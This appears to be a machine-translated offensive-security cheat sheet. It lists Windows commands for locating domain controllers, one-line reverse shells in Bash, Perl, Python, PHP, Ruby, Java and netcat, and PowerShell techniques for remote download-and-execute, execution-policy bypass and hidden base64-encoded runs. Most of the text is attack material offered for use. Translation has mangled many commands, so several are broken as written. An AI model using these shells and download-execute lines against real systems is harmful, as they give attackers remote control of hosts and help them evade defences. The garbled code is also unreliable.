Common methods for searching for domain controllers
1.net view
net view /domain
2.set log
set log
3. Record data by SRV
nslookup -type=SRV _ldap._tcp.corp
4. Use the nltest
nltest /dclist:corp
5. Use dsquery
DsQuery Server -domain corp
6. Use netdom
netdom query pdc
These are all built-in commands of THE WIN system. Sometimes, the versions of WIN are different, and some commands do not exist. Therefore, there is one more method and one more possibility of success. Various languages a word bounce shell
Bash [not generic, related to Linux distribution, successfully tested on Ubuntu]
Bash -i > &/dev/tcp/10.0.0.1/8080 0>&1
PERL
Perl -e ‘use Socket; I = “10.0.0.1”; I = “10.0.0.1”; I = “10.0.0.1”; p=1234; Socket (S, PF_INET SOCK_STREAM, getprotobyname (” TCP “)); If (connect (S, sockaddr_in (p, inetaton (p, inet_aton (p, inetaton (I)))) {open (STDIN, > “&” S “); Open (STDOUT, > “&” S “); > open (STDERR, “&” S “); The exec (“/bin/sh -i “); }; ‘
Python
Python – c ‘import socket, subprocess, OS; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); S.c onnect ((” 10.0.0.1 “, 1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); P = subprocess. Call ([/ bin/sh, “-i”]); ‘
PHP
PHP – r ‘$sock = fsockopen (” 10.0.0.1 “, 1234); The exec (“/bin/sh – I < 3 > & 2 & 3 > & 3 “); ‘
Ruby
Ruby – rsocket – e ‘f = TCPSocket. Open (” 10.0.0.1 “, 1234). To_i; Exec sprintf(” /bin/sh -i <&%d>&%d 2>&%d “,f,f,f)
Java
R = the Runtime. GetRuntime () p = r.e xec ([“/bin/bash “, “c”, “5 < > / dev/TCP/exec 10.0.0.1/2002; cat < 2 & 5 while = = =” “|” “” “read = “” Line; do = = “” “” $line = “” > & > 5 & 5; the done”] as String []) p.w aitFor ()
netcat
nc -e /bin/sh x.x.x.x 2333
However, if some nc versions do not have the -e parameter (non-traditional version), use the following method to solve the problem: rm/ TMP /f. mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f
Common Powershell commands are used
1. Perform remote download
Set-ExecutionPolicy RemoteSigned IEX (New-Object System.Net.Webclient). DownloadString (‘ raw.githubusercontent.com/besimorhino…).
2. Upload the PS script to a local PC and run it
PowerShell.exe -ep Bypass -File d:\powercat.ps1
3. Local interactive execution
E:> powershell. exe-executionPolicy Bypass invoke-powershelltcp-reverse-ipaddress 10.18.180.18 -port 4444
4. Encode the PS script into Base64 for execution.
Powershell -ep bypass -NoLogo -NonInteractive – noprofile-windowstyle Hidden -enc base64 Indicates the encrypted command